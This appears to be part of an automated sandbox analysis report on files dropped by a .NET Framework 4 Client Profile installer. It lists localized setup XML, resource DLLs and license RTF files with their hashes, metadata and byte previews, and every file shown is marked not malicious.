                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.e. .s.e.t.u.p. .c.a.n.n.o.t. .r.u.n. .i.n. .c.o.m.p.a.t.i.b.i.l.i.t.y. .m.o.d.e... .F.o.r. .m.o.r.e. .i.n.f.o.r.m.a.t.i.o.n.,. .s.e.e. .t.h.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.R.e.a.d.m.e. .f.i.l.e.&.l.t.;./.A.&.g.t.;...". ./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17240
                                                                                                                                                                  Entropy (8bit):5.151474565875158
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:byk5nUfwTW7JwWp0eW6jp8M+9HS8bC/TJs7kFkzQKPnEtObMacxc8hjeyveCXZBe:pgoTWp0eWB9ygC/TfFkzLXci2jpv8
                                                                                                                                                                  MD5:9547D24AC04B4D0D1DBF84F74F54FAF7
                                                                                                                                                                  SHA1:71AF6001C931C3DE7C98DDC337D89AB133FE48BB
                                                                                                                                                                  SHA-256:36D0159ED1A7D88000737E920375868765C0A1DD6F5A5ACBB79CF7D97D9E7A34
                                                                                                                                                                  SHA-512:8B6048F4185A711567679E2DE4789407077CE5BFE72102D3CB1F23051B8D3E6BFD5886C801D85B4E62F467DD12DA1C79026A4BC20B17F54C693B2F24E499D40F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........(...............................................P......<f....@.......................................... ...%...........,..X............................................................................................text...G...........................@..@.rsrc....%... ...&..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1033\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3188
                                                                                                                                                                  Entropy (8bit):5.285087573798006
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MHfTLNnTkWBTkFDZ8f4wHlre7MUxprfKmMb0+MW+1Ep9qeelN+sznM+IEp+Lk2:yfyTLillHW+mMhyAspz2
                                                                                                                                                                  MD5:B7129C4881F118FCB38F27CFB00CD36D
                                                                                                                                                                  SHA1:148989B710205C6A67B3F960567F6DAA98D75BDA
                                                                                                                                                                  SHA-256:DA3D6A6AC223744DF01C920EAE5F43E017F52350831C4F3F6BB38D78232EA3B4
                                                                                                                                                                  SHA-512:C0816D7676DDF0774EB9022BD305CDCDFEF590BE38E20C2D5584968BCA78E10A14BE375FA892593F11D04BE2734A30B5C1D21814B88C31814C713E08546436E7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;\red255\green0\blue0;\red0\green0\blue128;}..{\*\generator Msftedit 5.41.21.2508;}\viewkind4\uc1\pard\sb120\sa120\f0\fs20\par..\b\f1\fs28 MICROSOFT SOFTWARE SUPPLEMENTAL LICENSE TERMS\par..\fs22 MICROSOFT .NET FRAMEWORK 4 FOR MICROSOFT WINDOWS OPERATING SYSTEM \f0\par..\f1 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE FOR MICROSOFT WINDOWS OPERATING SYSTEM \f0\par..\pard\brdrb\brdrs\brdrw10\brsp20 \sb120\sa120\f1 AND ASSOCIATED LANGUAGE PACKS\b0\f0\par..\pard\sb120\sa120\f1\fs20 Microsoft Corporation (or based on where you live, one of its affiliates) licenses this supplement to you. If you are licensed to use Microsoft Windows operating system software (for which this supplement is applicable) (the \ldblquote software\rdblquote ), you may use this supplement. You may

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1035\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (597), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):77022
                                                                                                                                                                  Entropy (8bit):3.5745326569682434
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:wT42CX8ugmmuM92kEMeeGOCOUJPePJiWGICG+JND:wT42CX8ugmmuM92kEMeeGOCOUJPePJi/
                                                                                                                                                                  MD5:1AA252256C895B806E4E55F3EA8D5FFB
                                                                                                                                                                  SHA1:0322EE94C3D5EA26418A2FEA3F7E62EC5D04B81D
                                                                                                                                                                  SHA-256:8A68B3B6522C30502202ECB8D16AE160856947254461AC845B39451A3F2DB35F
                                                                                                                                                                  SHA-512:CE57784892C0BE55A00CED0ADC594A534D8A40819790CA483A29B6CD544C7A75AE4E9BDE9B6DC6DE489CECEB7883B7C2EA0E98A38FCC96D511157D61C8AA3E63
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A.s.e.n.n.u.s.o.h.j.e.l.m.a.a. .e.i. .v.o.i. .s.u.o.r.i.t.t.a.a. .y.h.t.e.e.n.s.o.p.i.v.u.u.s.t.i.l.a.s.s.a... .L.i.s...t.i.e.t.o.j.a. .o.n. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.L.u.e. .m.i.n.u.t. .-.t.i.e.d.o.s.t.o.s.s.a.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.166182954405893
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:rJkinUfwVWVRdufl0fXA1Z1j93S0WHpdcIirs442QXWMkeWEQKPnEtObMacxc8hg:rO16Lwz51JWMkeWELXci2jpvi
                                                                                                                                                                  MD5:881ADF55D51976CA592033A7ADF620B8
                                                                                                                                                                  SHA1:E82ED85E25411610D1F977A99368A7A6547C7C47
                                                                                                                                                                  SHA-256:88FCE9BFC0458E375811A7F1EA7CB9777E241D373EEF15D4B23835F77979D54C
                                                                                                                                                                  SHA-512:FED744A6E37F18B6CC3708EEB9F3E874269B1CBDB63B54284470E39E2B01D3DFB61F3626E34638231B9034FA699BDCCD7FE623D8478B205723EF45C1AA595FF9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......(.....@.......................................... ..x)...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1035\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3702
                                                                                                                                                                  Entropy (8bit):5.238529406475761
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MWBfuMAh8TZhqTy9DbDixX7zR7MrrqX37ILY7TpLgoyk1zERRe5g9KIMpDnYA06m:VfeRzH3vmLQzE6AOAC2
                                                                                                                                                                  MD5:4A43D21D1576E040DC9F5B90162A0401
                                                                                                                                                                  SHA1:1616FA39D9E4E7B2BB927CADED944DD14BD05656
                                                                                                                                                                  SHA-256:F0E2739892A1CE8A6445CEC72FF9AD88E939E21C719552E8ACD746F92F9FAFB7
                                                                                                                                                                  SHA-512:7A7C50B7EC09282A828B06C6A52340C1CAEFF0CFA01FF81375483045972D3645092B5B385103C19ACCADBE5B758DFF85A9DC6FDC00F9AF32AEE076E2C49F79BA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1035\b\f0\fs20 MICROSOFT-OHJELMISTON T\'c4YDENNYSOSAN K\'c4YTT\'d6OIKEUSSOPIMUKSEN EHDOT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1035\f0 MICROSOFT .NET FRAMEWORK 4 MICROSOFT WINDOWS -K\'c4YTT\'d6J\'c4RJESTELM\'c4\'c4N\lang1033\f1\par..\lang1035\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE MICROSOFT WINDOWS -K\'c4YTT\'d6J\'c4RJESTELM\'c4\'c4N\par..\lang1033 SEK\'c4 NIIHIN LIITTYV\'c4T KIELIPAKETIT\par..\pard\nowidctlpar\sb120\sa120\lang1035\b0 Microsoft Corporation (tai asiakkaan asuinpaikan mukaan m\'e4\'e4r\'e4ytyv\'e4 Microsoft Corporationin konserniyhti\'f6) my\'f6nt\'e4\'e4 asiakkaalle t\'e4m\'e4n t\'e4ydennysosan k\'e4ytt\'f6oikeudet.\la

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1036\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (666), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82962
                                                                                                                                                                  Entropy (8bit):3.5891850903091727
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCFpNvOvt1jagJVzRzchryjiTIJz0kbG52bxVv:WvotpaluaIJzaIv
                                                                                                                                                                  MD5:1DAD88FAED661DB34EEF535D36563EE2
                                                                                                                                                                  SHA1:0525B2F97EDDBD26325FDDC561BF8A0CDA3B0497
                                                                                                                                                                  SHA-256:9605468D426BCBBE00165339D84804E5EB2547BFE437D640320B7BFEF0B399B6
                                                                                                                                                                  SHA-512:CCD0BFFBF0538152CCCD4B081C15079716A5FF9AD04CEE8679B7F721441F89EB7C6F8004CFF7E1DDE9188F5201F573000D0C078474EDF124CFA4C619E692D6BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".L.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .n.e. .p.e.u.t. .p.a.s. .s.'.e.x...c.u.t.e.r. .e.n. .m.o.d.e. .d.e. .c.o.m.p.a.t.i.b.i.l.i.t..... .P.o.u.r. .p.l.u.s. .d.'.i.n.f.o.r.m.a.t.i.o.n.s.,. .c.o.n.s.u.l.t.e.z. .l.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.f.i.c.h.i.e.r. .r.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.112489568342605
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:J7Z66AY9li3OoDDkbiWpQeWELXci2jpv8:JffiZDgycMi2jpv8
                                                                                                                                                                  MD5:93F57216FE49E7E2A75844EDFCCC2E09
                                                                                                                                                                  SHA1:DCCD52787F147E9581D303A444C8EE134AFC61A8
                                                                                                                                                                  SHA-256:2506827219B461B7C6C862DAE29C8BFF8CB7F4A6C28D2FF60724CAC70903987D
                                                                                                                                                                  SHA-512:EADFFB534C5447C24B50C7DEFA5902F9EB2DCC4CF9AF8F43FA889B3367EA25DFA6EA87FF89C59F1B7BBF7106888F05C7134718021B44337AE5B7D1F808303BB1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P......B|....@.......................................... ...+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1036\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3526
                                                                                                                                                                  Entropy (8bit):5.107243175407303
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:MTBfEhmvTf8vTR/DSIem21HDpHD1cT+Tot4er42xzK8/ptMpDLaFNsNGlDPsCU2:IfJw95eJlx1E+Tot4er42xzKuOKPU2
                                                                                                                                                                  MD5:E0DA85DB8B02A89A63601EA6B9AD7FF8
                                                                                                                                                                  SHA1:5F91C397CF3FBF4475FF71339B2D69C45694130F
                                                                                                                                                                  SHA-256:8880B979A4F8ECDD529241D9AE02583FECD21010EA1E255A1CBCD0C6FB2F75E9
                                                                                                                                                                  SHA-512:C8F47154145507C89D9B599D725C3444A206AE2AFAC2ACA4B2EA18980DEC134A25FC539CE1FB2291AF942DC1CA25EE2FFF323FB17F43F5BF91157A30B19BCD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1036\b\f0\fs20 TERMES DE CONTRAT DE LICENCE D\rquote UN SUPPL\'c9MENT MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK\~4 POUR LE SYST\'c8ME D\rquote EXPLOITATION MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK\~4 CLIENT PROFILE POUR LE SYST\'c8ME D\rquote EXPLOITATION MICROSOFT WINDOWS\par..ET LES LANGAGE PACKS ASSOCI\'c9S\par..\pard\nowidctlpar\sb120\sa120\b0 Microsoft Corporation (ou, en fonction du lieu o\'f9 vous vivez, l\rquote un de ses affili\'e9s) vous accorde une licence pour ce suppl\'e9ment.\b \b0 Si vous \'eates titulaire d\rquote une licence d\rquote utilisation du logiciel de syst\'e8me d\rquote exploita

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1037\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (599), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72076
                                                                                                                                                                  Entropy (8bit):4.190903034087703
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wkvJlqaYsxaAzdNhXdQGKbvvGu1kZJNvSX33qLv:OHqaBxaeJN7T
                                                                                                                                                                  MD5:16E6416756C1829238EF1814EBF48AD6
                                                                                                                                                                  SHA1:C9236906317B3D806F419B7A98598DD21E27AD64
                                                                                                                                                                  SHA-256:C0EE256567EA26BBD646F019A1D12F3ECED20B992718976514AFA757ADF15DEA
                                                                                                                                                                  SHA-512:AA595ED0B3B1DB280F94B29FA0CB9DB25441A1EF54355ABF760B6B837E8CE8E035537738E666D27DD2A8D295D7517C325A5684E16304887CCB17313CA4290CE6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."............... ............. ....... ............. ........... ......... ............... ........... ......... .........,. ....... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;......... .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16728
                                                                                                                                                                  Entropy (8bit):5.741920618836553
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:KADkdHUfwVW13jowXiTeISvjpHawC1wWmeW8QKPnEtObMacxc8hjeyveCX1HQ:K506Qrw5wWmeW8LXci2jpvfw
                                                                                                                                                                  MD5:06CC83E6C677DB13757DF4242F5679F7
                                                                                                                                                                  SHA1:493D44DA1C36A5CEC83B0420BEBC2BF76A9262E8
                                                                                                                                                                  SHA-256:8E3C9332AB38DAD95A4293C466EAB88B17DEE82C87BE047839E85BB816B6146E
                                                                                                                                                                  SHA-512:D4E1694AFE2A35A7A2DB3C8B2A4F83A536DE0AFC5871AE44591317B5B6489B3911F7AEDE8AD9584DCB0BAA8D84B65A20393D587D6F993035FA7DFE13AEAF10CF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........&...............................................P............@.......................................... ..."...........*..X............................................................................................text...G...........................@..@.rsrc....0... ...$..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1037\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1255, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6851
                                                                                                                                                                  Entropy (8bit):4.46966326918659
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:2Rf64JJR1vTJ3R1vTJZZDg1YGZmF1plypIuw75TYgnMJ9nqIQ2fPMpicPtxScRtZ:0fXRskPWIHxYnJVPOxScl9ZnlfZ4LH2
                                                                                                                                                                  MD5:74C015D4E8024F9A49CF8D183CBDB0F5
                                                                                                                                                                  SHA1:8428260A9E522A712EFC8740AF848BD7521DEB8E
                                                                                                                                                                  SHA-256:D7718CF8F97F78656AA8964721757EA7E369FC7BBB052777C90E63D07C7CC7C5
                                                                                                                                                                  SHA-512:BB8748054F194450BC0383D4E88600F00E01BA8FD182C3C3A5A09CFBB0C2FBC30B9CECBAD0B99DDA1EEFA5C3EB56AD50CCACF3FE39302842F16A17082F5F8D04
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1255\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset177 Tahoma;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset177 Times New Roman;}}..{\colortbl ;\red0\green0\blue0;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\rtlpar\nowidctlpar\sb120\sa120\qr\lang1037\b\f0\rtlch\fs20\'fa\'f0\'e0\'e9 \'f8\'f9\'e9\'e5\'ef \'ee\'f9\'ec\'e9\'ee\'e9\'ed \'f2\'e1\'e5\'f8 \'fa\'e5\'eb\'f0\'fa \lang1033\f1\ltrch MICROSOFT\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \rtlpar\nowidctlpar\sb120\sa120\qr\f1 MICROSOFT .NET FRAMEWORK 4\lang1037\f0\rtlch \'f2\'e1\'e5\'f8 \'ee\'f2\'f8\'eb\'fa \'e4\'e4\'f4\'f2\'ec\'e4 \lang1033\f1\ltrch MICROSOFT WINDOWS\par..\lang1037\f0\rtlch\'f4\'f8\'e5\'f4\'e9\'ec \'ec\'f7\'e5\'e7 \'f9\'ec \lang1033\f1\ltrch MICROSOFT .NET FRAMEWORK 4\lang1037\f0\rtlch \'f2\'e1\'e5\'f8 \'ee\'f2\'f8\'eb\'fa \'e4\'e4\'f4\'f2\'ec\'e4 \lang1033\f1\ltrch MICROSOFT

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1038\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (723), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):86442
                                                                                                                                                                  Entropy (8bit):3.674300926924721
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:Ji+5JLuNF70SNjPBzuXrXdJHbdi3kC4kL1:Ji+5JLyF70SNjPBzuXrXdJHbdi3kCZZ
                                                                                                                                                                  MD5:89D4356E0F226E75CA71D48690E8EC15
                                                                                                                                                                  SHA1:2336CAA971527977F47512BC74E88CEC3F770C7D
                                                                                                                                                                  SHA-256:FCBB619DEB2D57B791A78954B0342DBB2FEF7DDD711066A0786C8EF669D2B385
                                                                                                                                                                  SHA-512:FA03D55A4AAFE94CBF5C134A65BD809FC86C042BC1B8FFBC9A2A5412EB70A468551C05C44B6CE81F638DF43CCA599AA1DD6F42F2DF3012C8A95A3612DF7C821E
                                                                                                                                                                  Malicious:false
